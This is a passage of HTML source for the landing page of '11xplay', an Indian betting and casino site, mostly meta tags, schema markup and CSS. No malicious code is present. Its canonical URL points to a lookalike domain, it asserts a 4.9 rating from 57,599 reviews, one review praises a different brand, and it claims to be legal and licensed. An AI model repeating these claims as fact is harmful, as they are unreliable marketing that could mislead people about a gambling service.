<!DOCTYPE html>
<html lang="en">
<head>

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />
<title>Welcome to 11xplay.pro</title>
<meta name="title" content="Welcome to 11xplay.pro" />
<meta name="description" content="11xplay is India's most popular betting, live casino and fantasy gaming platform. Daily more than 5000+ sports games available in 11xplay.pro website. Instant deposit and withdrawal. Best odds, 24/7 customer support, and referral bonuses. Login to 11xplay account now!" />
<meta name="keywords" content="welcome to 11xplay, 11xplay, 11xplay login, 11xplay.pro, 11play.pro login, 11xplay pro, 11xplay apk, 11xplay new ID, reddy anna 11xplay, 11xplay.com app download, 11xplay login ID and password india, 11xplay online ID login, 11xplay reddy login ID and password, 11xplay betting, 11xplay account login, welcome to 11xplay.pro" />
<link rel="canonical" href="https://11xpllay.pro/" />
<meta name="author" content="11xplay"/>
<meta name="copyright" content="11xplay.com"/>
<meta name="reply-to" content="info@11xplay.com"/>
<meta name="expires" content="Never"/>

<!-- Open Graph meta tags for 11xplay -->
<meta property="og:title" content="Welcome to 11xplay" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://11xpllay.pro/" />
<meta property="og:image" content="https://11xpllay.pro/assets/img/11xplay/logo.png" />
<meta property="og:description" content="11xplay is India's ultimate destination for thrilling sports betting, live casino action, and fantasy gaming! Daily more than 5000+ sports games available in 11xplay.com website. Automatic deposit and withdrawal facilities, best betting odds, and 100% trusted and genuine. Login to 11xplay account today." />
<meta property="og:site_name" content="11xplay" />
<meta property="og:locale" content="en_GB" />
<meta property="og:image:alt" content="11xplay" />

<!-- Twitter Card meta tags for 11xplay -->
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="Welcome to 11xplay">
<meta name="twitter:description" content="11xplay is India's ultimate destination for thrilling sports betting, live casino action, and fantasy gaming! Daily more than 5000+ sports games available in 11xplay.com website. Automatic deposit and withdrawal facilities, best betting odds, and 100% trusted and genuine. Login to 11xplay account today.">
<meta name="twitter:image" content="https://11xpllay.pro/assets/img/11xplay/logo.png">
<meta name="twitter:url" content="https://11xpllay.pro/">
<meta name="twitter:site" content="@11xplaygames">

<!-- Other Meta Tags -->
<meta name="coverage" content="Worldwide"/>
<meta name="allow-search" content="Yes"/>
<meta name="robots" content="index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1"/>
<meta name="theme-color" content="#0073e6">
<meta name="HandheldFriendly" content="True">
<meta name="apple-mobile-web-app-capable" content="Yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#0073e6">
<meta name="geo.region" content="IN-KA">
<meta name="geo.placename" content="Bangalore">
<meta name="distribution" content="Global"/>
<meta name="language" content="English"/>

    <script type="application/ld+json">
        {
          "@context": "https://schema.org",
          "@type": "SportsOrganization",
          "name": "Welcome to 11xplay",
          "url": "https://11xpllay.pro/",
          "logo": "https://11xpllay.pro/assets/img/11xplay/logo.png",
          "description": "11xplay is India's ultimate destination for thrilling sports betting, live casino action, and fantasy gaming! Daily more than 5000+ sports games available in 11xplay.pro website. Automatic deposit and withdrawal facilities, best betting odds, and 100% trusted and genuine. Login to 11xplay account today.",
          "sport": "Cricket",
          "foundingDate": "2021",
          "founders": {
            "@type": "Person",
            "name": "11xplay"
          },
          "contactPoint": {
            "@type": "ContactPoint",
            "contactType": "Customer Service",
            "email": "support@11xplay.pro",
            "areaServed": "IN",
            "availableLanguage": "English"
          },
          "sameAs": [
            "https://www.instagram.com/11xpl_ay/"
          ]
        }
    </script>	
    
    <script type="application/ld+json">
        {
          "@context": "https://schema.org",
          "@type": "FAQPage",
          "mainEntity": [{
            "@type": "Question",
            "name": "Is 11xplay Legal in India?",
            "acceptedAnswer": {
              "@type": "Answer",
              "text": "Yes, 11xplay is a legitimate and licensed online gaming platform in India. It follows all the necessary laws and regulations and operates under licenses from trusted authorities, ensuring a safe and fair betting experience for users."
            }
          },{
            "@type": "Question",
            "name": "What Sports Can I Bet on with 11xplay?",
            "acceptedAnswer": {
              "@type": "Answer",
              "text": "11xplay offers a variety of sports for betting, including cricket, football, basketball, tennis, and many more. You can explore multiple betting options and enjoy wagering on popular leagues and tournaments worldwide."
            }
          },{
            "@type": "Question",
            "name": "How Do I Deposit or Withdraw Money on 11xplay?",
            "acceptedAnswer": {
              "@type": "Answer",
              "text": "Depositing and withdrawing funds is simple with 11xplay. We provide secure options like credit and debit cards, bank transfers, and e-wallets. Log in, click the deposit or withdrawal option, select your preferred method, and follow the steps to complete the process."
            }
          },{
            "@type": "Question",
            "name": "Is My Information Safe on 11xplay?",
            "acceptedAnswer": {
              "@type": "Answer",
              "text": "Absolutely; Your privacy and security are our priority. 11xplay uses top-notch encryption technology to protect your personal and financial data, ensuring that your details remain private and secure."
            }
          },{
            "@type": "Question",
            "name": "What Bonuses and Promotions Does 11xplay Offer?",
            "acceptedAnswer": {
              "@type": "Answer",
              "text": "11xplay provides a range of exciting promotions and bonuses, such as welcome offers for new users, free bets, and cashback deals. Check the Promotions section regularly to make the most of these rewards."
            }
          },{
            "@type": "Question",
            "name": "How Do I Use the Live Betting Feature on 11xplay?",
            "acceptedAnswer": {
              "@type": "Answer",
              "text": "You can enjoy live betting on 11xplay during ongoing matches. Head to the live betting section on our platform, select the event you want to bet on, and place your wagers while the game unfolds."
            }
          },{
            "@type": "Question",
            "name": "How Can I Reach the 11xplay Support Team?",
            "acceptedAnswer": {
              "@type": "Answer",
              "text": "Our customer support team is available to assist you at any time. You can contact us through email, phone, or live chat for quick and reliable support."
            }
          },{
            "@type": "Question",
            "name": "Does 11xplay Offer Responsible Gaming Tools?",
            "acceptedAnswer": {
              "@type": "Answer",
              "text": "Yes, 11xplay promotes responsible gaming by offering features like deposit limits and self-exclusion options. We also provide access to resources and organizations that support safe gambling practices."
            }
          },{
            "@type": "Question",
            "name": "Can I Use 11xplay on My Mobile Phone?",
            "acceptedAnswer": {
              "@type": "Answer",
              "text": "Absolutely, 11xplay is mobile-friendly, allowing you to enjoy sports betting and casino games on your smartphone or tablet. You can access the platform via our website or download the app for added convenience."
            }
          }]
        }
    </script>

    <script type="application/ld+json">

{
  "@context": "https://schema.org",
  "@type": "Product",
  "name": "11xplay",
  "description": "11xplay is India's ultimate destination for thrilling sports betting, live casino action, and fantasy gaming! Daily more than 5000+ sports games available in 11xplay.com website. Automatic deposit and withdrawal facilities, best betting odds, and 100% trusted and genuine. Login to 11xplay account today.",
  "aggregateRating": {
    "@type": "AggregateRating",
    "ratingValue": "4.9",
    "reviewCount": "57599"
  },
  "review": [
    {
      "@type": "Review",
      "author": {
        "@type": "Person",
        "name": "Raja"
      },
      "reviewRating": {
        "@type": "Rating",
        "ratingValue": "5",
        "bestRating": "5"
      },
      "datePublished": "2024-09-27",
      "reviewBody": "मैंने कभी नहीं सोचा था कि क्रिकेट पर सट्टा लगाना इतना आसान हो सकता है! टाइगर बुक के साथ, मुझे दांव लगाने और मैचों का आनंद लेने का अच्छा अनुभव हुआ है। यह 2024 के लिए अत्यधिक अनुशंसित सट्टेबाजी साइट है|"
    },
    {
      "@type": "Review",
      "author": {
        "@type": "Person",
        "name": "Harsh Mehta"
      },
      "reviewRating": {
        "@type": "Rating",
        "ratingValue": "4.9",
        "bestRating": "5"
      },
      "datePublished": "2024-09-18",
      "reviewBody": "I've tried several betting sites, but no one is compared to the simple and easy login process of 11xplay. I play their games sometimes on my phone and sometimes on my laptop, too, and trust me, I never thought placing bets on cricket matches would be this simple and worry-free."
    }
  ]
}

</script>

        <!-- Favicons -->
        <link href="https://11xpllay.pro/assets/img/favicon.ico" rel="icon">
	    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>

    <!-- Favicons -->
    <link
    rel="shortcut icon"
    type="image/ico"
    href="https://11xpllay.pro/assets/img/favicon.ico"/>

        <!-- Google Fonts -->
        <style type="text/css">
            @font-face {
                font-family: 'Lato';
                font-style: italic;
                font-weight: 100;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u-w4BMUTPHjxsIPx-mPCLC79U11vU.woff2) format('woff2');
                unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
            }

            @font-face {
                font-family: 'Lato';
                font-style: italic;
                font-weight: 100;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u-w4BMUTPHjxsIPx-oPCLC79U1.woff2) format('woff2');
                unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
            }

            @font-face {
                font-family: 'Lato';
                font-style: italic;
                font-weight: 300;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI9w2_FQftx9897sxZ.woff2) format('woff2');
                unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
            }

            @font-face {
                font-family: 'Lato';
                font-style: italic;
                font-weight: 300;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI9w2_Gwftx9897g.woff2) format('woff2');
                unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
            }

            @font-face {
                font-family: 'Lato';
                font-style: italic;
                font-weight: 400;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAUi-qNiXg7eU0.woff2) format('woff2');
                unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
            }

            @font-face {
                font-family: 'Lato';
                font-style: italic;
                font-weight: 400;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAXC-qNiXg7Q.woff2) format('woff2');
                unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
            }

            @font-face {
                font-family: 'Lato';
                font-style: italic;
                font-weight: 700;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wq_FQftx9897sxZ.woff2) format('woff2');
                unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
            }

            @font-face {
                font-family: 'Lato';
                font-style: italic;
                font-weight: 700;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wq_Gwftx9897g.woff2) format('woff2');
                unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
            }

            @font-face {
                font-family: 'Lato';
                font-style: italic;
                font-weight: 900;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI3wi_FQftx9897sxZ.woff2) format('woff2');
                unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
            }

            @font-face {
                font-family: 'Lato';
                font-style: italic;
                font-weight: 900;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI3wi_Gwftx9897g.woff2) format('woff2');
                unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
            }

            @font-face {
                font-family: 'Lato';
                font-style: normal;
                font-weight: 100;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHh30AUi-qNiXg7eU0.woff2) format('woff2');
                unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
            }

            @font-face {
                font-family: 'Lato';
                font-style: normal;
                font-weight: 100;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHh30AXC-qNiXg7Q.woff2) format('woff2');
                unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
            }

            @font-face {
                font-family: 'Lato';
                font-style: normal;
                font-weight: 300;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwaPGQ3q5d0N7w.woff2) format('woff2');
                unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
            }

            @font-face {
                font-family: 'Lato';
                font-style: normal;
                font-weight: 300;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwiPGQ3q5d0.woff2) format('woff2');
                unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
            }

            @font-face {
                font-family: 'Lato';
                font-style: normal;
                font-weight: 400;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjxAwXiWtFCfQ7A.woff2) format('woff2');
                unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
            }

            @font-face {
                font-family: 'Lato';
                font-style: normal;
                font-weight: 400;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXiWtFCc.woff2) format('woff2');
                unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
            }

            @font-face {
                font-family: 'Lato';
                font-style: normal;
                font-weight: 700;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwaPGQ3q5d0N7w.woff2) format('woff2');
                unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
            }

            @font-face {
                font-family: 'Lato';
                font-style: normal;
                font-weight: 700;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwiPGQ3q5d0.woff2) format('woff2');
                unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
            }

            @font-face {
                font-family: 'Lato';
                font-style: normal;
                font-weight: 900;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh50XSwaPGQ3q5d0N7w.woff2) format('woff2');
                unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
            }

            @font-face {
                font-family: 'Lato';
                font-style: normal;
                font-weight: 900;
                font-display: swap;
                src: url(https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh50XSwiPGQ3q5d0.woff2) format('woff2');
                unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
            }
        </style>
        <!-- Vendor CSS Files -->
        <style>
            @charset "UTF-8";:root {
                --bs-blue: #0d6efd;
                --bs-indigo: #6610f2;
                --bs-purple: #6f42c1;
                --bs-pink: #d63384;
                --bs-red: #dc3545;
                --bs-orange: #fd7e14;
                --bs-yellow: #ffc107;
                --bs-green: #198754;
                --bs-teal: #20c997;
                --bs-cyan: #0dcaf0;
                --bs-black: #000;
                --bs-white: #fff;
                --bs-gray: #6c757d;
                --bs-gray-dark: #343a40;
                --bs-gray-100: #f8f9fa;
                --bs-gray-200: #e9ecef;
                --bs-gray-300: #dee2e6;
                --bs-gray-400: #ced4da;
                --bs-gray-500: #adb5bd;
                --bs-gray-600: #6c757d;
                --bs-gray-700: #495057;
                --bs-gray-800: #343a40;
                --bs-gray-900: #212529;
                --bs-primary: #0d6efd;
                --bs-secondary: #6c757d;
                --bs-success: #198754;
                --bs-info: #0dcaf0;
                --bs-warning: #ffc107;
                --bs-danger: #dc3545;
                --bs-light: #f8f9fa;
                --bs-dark: #212529;
                --bs-primary-rgb: 13,110,253;
                --bs-secondary-rgb: 108,117,125;
                --bs-success-rgb: 25,135,84;
                --bs-info-rgb: 13,202,240;
                --bs-warning-rgb: 255,193,7;
                --bs-danger-rgb: 220,53,69;
                --bs-light-rgb: 248,249,250;
                --bs-dark-rgb: 33,37,41;
                --bs-white-rgb: 255,255,255;
                --bs-black-rgb: 0,0,0;
                --bs-body-color-rgb: 33,37,41;
                --bs-body-bg-rgb: 255,255,255;
                --bs-font-sans-serif: system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue","Noto Sans","Liberation Sans",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";
                --bs-font-monospace: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;
                --bs-gradient: linear-gradient(180deg, rgba(255, 255, 255, 0.15), rgba(255, 255, 255, 0));
                --bs-body-font-family: var(--bs-font-sans-serif);
                --bs-body-font-size: 1rem;
                --bs-body-font-weight: 400;
                --bs-body-line-height: 1.5;
                --bs-body-color: #212529;
                --bs-body-bg: #fff;
                --bs-border-width: 1px;
                --bs-border-style: solid;
                --bs-border-color: #dee2e6;
                --bs-border-color-translucent: rgba(0, 0, 0, 0.175);
                --bs-border-radius: 0.375rem;
                --bs-border-radius-sm: 0.25rem;
                --bs-border-radius-lg: 0.5rem;
                --bs-border-radius-xl: 1rem;
                --bs-border-radius-2xl: 2rem;
                --bs-border-radius-pill: 50rem;
                --bs-link-color: #0d6efd;
                --bs-link-hover-color: #0a58ca;
                --bs-code-color: #d63384;
                --bs-highlight-bg: #fff3cd;
            }

            *,::after,::before {
                box-sizing: border-box;
            }

            @media (prefers-reduced-motion:no-preference) {
                :root {
                    scroll-behavior: smooth;
                }
            }

            body {
                margin: 0;
                font-family: var(--bs-body-font-family);
                font-size: var(--bs-body-font-size);
                font-weight: var(--bs-body-font-weight);
                line-height: var(--bs-body-line-height);
                color: var(--bs-body-color);
                text-align: var(--bs-body-text-align);
                background-color: var(--bs-body-bg);
                -webkit-text-size-adjust: 100%;
                -webkit-tap-highlight-color: transparent;
            }
        </style>
		<style>section{padding:50px;background:#0b0d2a}.titlehome{text-transform:uppercase;margin-bottom:20px;color:#fff;-webkit-text-fill-color:#0000;background:linear-gradient(179deg,#fff,#fff);-webkit-background-clip:text;font-weight:800}.ss_div{position:relative}.home-animated{font-weight:700;letter-spacing:1px;position:absolute;padding:5px 15px;color:#fff;text-decoration:none;overflow:hidden;border-radius:3px;background:var(--theme-primary-color);left:20px;bottom:20px;font-size:12px;text-transform:uppercase;animation:zoom-in-zoom-out 1s ease-out infinite}@keyframes zoom-in-zoom-out{0%{transform:scale(1)}50%{transform:scale(1.1)}to{transform:scale(1)}}.home-animated   span{border-radisu:10px}.home-animated   span:first-child{position:absolute;top:0;right:0;width:100%;height:4px;border-radisu:10px;background:linear-gradient(90deg,#fff400,#fff);animation:animate1 2s linear infinite}@keyframes animate1{0%{transform:translateX(-100%)}to{transform:translateX(100%)}}.home-animated   span:nth-child(2){position:absolute;top:0;right:0;height:100%;width:4px;background:linear-gradient(180deg,#05fb33,#fff);animation:animate2 2s linear infinite;animation-delay:1s}@keyframes animate2{0%{transform:translateY(-100%)}to{transform:translateY(100%)}}.home-animated   span:nth-child(3){position:absolute;bottom:0;right:0;width:100%;height:4px;background:linear-gradient(270deg,#ff7d88,#fff);animation:animate3 2s linear infinite}@keyframes animate3{0%{transform:translateX(100%)}to{transform:translateX(-100%)}}.home-animated   span:nth-child(4){position:absolute;top:0;left:0;height:100%;width:4px;background:linear-gradient(0deg,#05d8fb,#fff);animation:animate4 2s linear infinite;animation-delay:1s}@keyframes animate4{0%{transform:translateY(100%)}to{transform:translateY(-100%)}}.casino_marketing, .marketing{background:#000}.casino_marketing   h2, .marketing   h2{-webkit-text-fill-color:#0000;-webkit-background:linear-gradient(90deg,#fdbb2d,#22c1c3);background:linear-gradient(90deg,#fdbb2d,#22c1c3);-webkit-background-clip:text;font-size:40px;font-weight:800;text-transform:uppercase;letter-spacing:2px}.casino_marketing   p, .marketing   p{color:#fff;font-size:20px}.thumbnail__item__pic{margin-bottom:10px;border-radius:15px}.casino   .row   .col-6{padding:0 6px}.thumbnail__item__pic   img{border-radius:15px}.all-providers   .col-6   img{border:1px solid #fff;width:100%;object-fit:contain;padding:0;margin-bottom:16px}.footer_home{background:#fff;padding:40px 0 10px;position:relative}.footer_home   p{margin-bottom:0}.footer_home   p   a{color:#1a315d;font-weight:700;font-size:14px}.footer_home   h2{position:relative;font-size:22px;font-weight:800;margin-bottom:10px;text-transform:uppercase}.footer_home   h2:after{content:"";background:#ddd;height:1px;width:50%;position:absolute;left:0;bottom:-8px}.footer__nav   ul{display:inline-block;margin-top:10px}.footer__nav   ul   li{list-style:none}.footer__nav   ul   li   a{font-size:14px;color:#707070;display:block;font-weight:700;margin-bottom:10px}.footer__nav   ul   li   a:hover{color:#1a315d;text-decoration:underline}.footer__copyright__text{color:#000;margin-bottom:0;text-align:right}.securitylogo{margin-top:20px}.securitylogo   img{height:40px}.footer__copyright__text   a{color:#e53637}.bottom-links{text-align:center;border-top:1px solid #ddd}.footer_home   img{cursor:pointer}.footer_home   .bottom-links   a{margin:0 5px;position:relative;font-size:12px;font-weight:500}.footer_home   .bottom-links   a:hover{color:#167abf;text-decoration:underline}.bottom-links   a:after{content:"";background:#167abf;position:absolute;right:-7px;width:1px;top:1px;height:100%}.bottom-links   a:last-child:after{display:none}.footer__logo   img{width:200px}.footer__nav   ul{padding:0}@media (max-width: 991px){.footer_home   h2:after{margin:0 auto;left:0;right:0}.footer_home   h2{text-align:center}.footer__logo   img{width:150px;display:block;margin:0 auto}.footer__logo   p, .footer__nav   ul{text-align:center}.footer__nav   ul{margin:0 auto;padding:0}.footer__nav{text-align:center}section{padding:20px 0}.casino_marketing   h2, .marketing   h2{font-size:30px;text-align:center}.casino_marketing   p, .marketing   p{text-align:center}.home-animated{padding:3px 12px;letter-spacing:0;font-size:10px;bottom:10px;left:10px}.securitylogo, .titlehome{text-align:center}.securitylogo   p.mt-3   img{text-align:center;display:block;margin:0 auto}.all-providers   .col-6   img, .ss_div, .thumbnail__item__pic{margin-bottom:5px}.bottom-links{margin-top:10px}.all-providers   .row, .casino   .row, .sportsSection   .row{margin:0}.all-providers   .row   .col-6, .casino   .row   .col-6, .sportsSection   .row   .col-6{padding:0 3px}.all-providers   .container, .casino   .container, .sportsSection   .container{padding:0 5px}}</style>
		
		
        <link href="assets/css/bootstrap.min.css" rel="stylesheet">
 
        <link href="assets/css/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
     
        <style>
            body::-webkit-scrollbar {
                width: 8px;
                background-color: #eee !important;
            }

            body::-webkit-scrollbar-thumb {
                background-color: var(--theme-primary-color) !important;
            }

            :root {
                scroll-behavior: smooth;
            }

            body {
                font-family: 'Lato', sans-serif;
                background: #fff;
                color: #444444;
            }

            @media (max-width: 991px) {
            }
        </style>

        <link href="assets/css/style.css" rel="stylesheet" >
        <link href="assets/css/theme_master.css" rel="stylesheet" >
      
        <script src="https://wchat.freshchat.com/js/widget.js" defer></script>
        <style>
            :root {
                --theme1-bg: #1a3da6;
                --theme2-bg: #0f2462;
            }
        </style>
	    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
        

    </head>
    <body class="fullpage">
        <header  id="header" class="header fixed-top d-flex align-items-center">
			<div class="container-fluid d-flex align-items-center">
				<div class="d-flex align-items-center justify-content-between">
					<a href="/" class="logo d-flex align-items-center">
						<img alt="" class="img-fluid" src="assets/img/11xplay/logo.png">
						</a>
					</div>
					<nav class="header-nav ms-auto">
						<ul class="d-flex align-items-center">
						
							<li  class="nav-item expo_bal loginbtn">
								<a  href="javascript:void(0);" class="nav-link">
									<i  class="bi bi-box-arrow-in-right"></i>
									<span >Demo</span>
								</a>
							</li>
							
							<li class="nav-item expo_bal signupbtn" id="cust_btn">
								<a href="javascript:void(0);" class="nav-link">
									<i class="bi bi-box-arrow-in-right"></i>
									<span>Login</span>
								</a>
							</li>
						</ul>
					</nav>
				</div>
			</header>
			
			<div class="commentary">
				<img src="assets/img/commentary.png">
				<marquee>New Version Available With International Casino Please Contact Your Upline</marquee>
			</div>
			
			<div id="main" class="main">
				<div id="bannerMain" class="owl-carousel owl-theme">
					<div class="item"><img src="assets/img/banner1.png" class="img-fluid"></div>
					<div class="item"><img src="assets/img/banner2.png" class="img-fluid"></div>
					<div class="item"><img src="assets/img/banner3.png" class="img-fluid"></div>
					<div class="item"><img src="assets/img/banner4.png" class="img-fluid"></div>						
				</div>					
			</div>
			
			<section  class="sportsSection">
				<div  class="container">
					<h2  class="titlehome">IN OUR EXCHANGE...</h2>
					<div  class="row">
					<div  class="col-md-4 col-6" tabindex="0">
						<div  class="ss_div">
							<img  class="img-fluid" src="assets/img/home_exchange_games/4.webp">
								<span  class="home-animated">
									<span ></span>
									<span ></span>
									<span ></span>
									<span ></span> Cricket 
								</span>
							</div>
						</div>
						<div  class="col-md-4 col-6" tabindex="0">
							<div  class="ss_div">
								<img  class="img-fluid" src="assets/img/home_exchange_games/1.webp">
									<span  class="home-animated">
										<span ></span>
										<span ></span>
										<span ></span>
										<span ></span> Football 
									</span>
								</div>
							</div>
							<div  class="col-md-4 col-6" tabindex="0">
								<div  class="ss_div">
									<img  class="img-fluid" src="assets/img/home_exchange_games/2.webp">
										<span  class="home-animated">
											<span ></span>
											<span ></span>
											<span ></span>
											<span ></span> Tennis 
										</span>
									</div>
								</div>
								<div  class="col-md-4 col-6" tabindex="0">
									<div  class="ss_div">
										<img  class="img-fluid" src="assets/img/home_exchange_games/99998.webp">
											<span  class="home-animated">
												<span ></span>
												<span ></span>
												<span ></span>
												<span ></span> Int Casino 
											</span>
										</div>
									</div>
									<div  class="col-md-4 col-6" tabindex="0">
										<div  class="ss_div">
											<img  class="img-fluid" src="assets/img/home_exchange_games/7.webp">
												<span  class="home-animated">
													<span ></span>
													<span ></span>
													<span ></span>
													<span ></span> Horse Racing 
												</span>
											</div>
										</div>
										<div  class="col-md-4 col-6" tabindex="0">
											<div  class="ss_div">
												<img  class="img-fluid" src="assets/img/home_exchange_games/4339.webp">
													<span  class="home-animated">
														<span ></span>
														<span ></span>
														<span ></span>
														<span ></span> Greyhound Racing 
													</span>
												</div>
											</div>
											<!---->
										</div>
									</div>
								</section>
			<section class="marketing">
				<div  class="container">
				<div  class="row align-items-center">
					<div  class="col-md-6">
						<h2 >Instant Action?</h2>
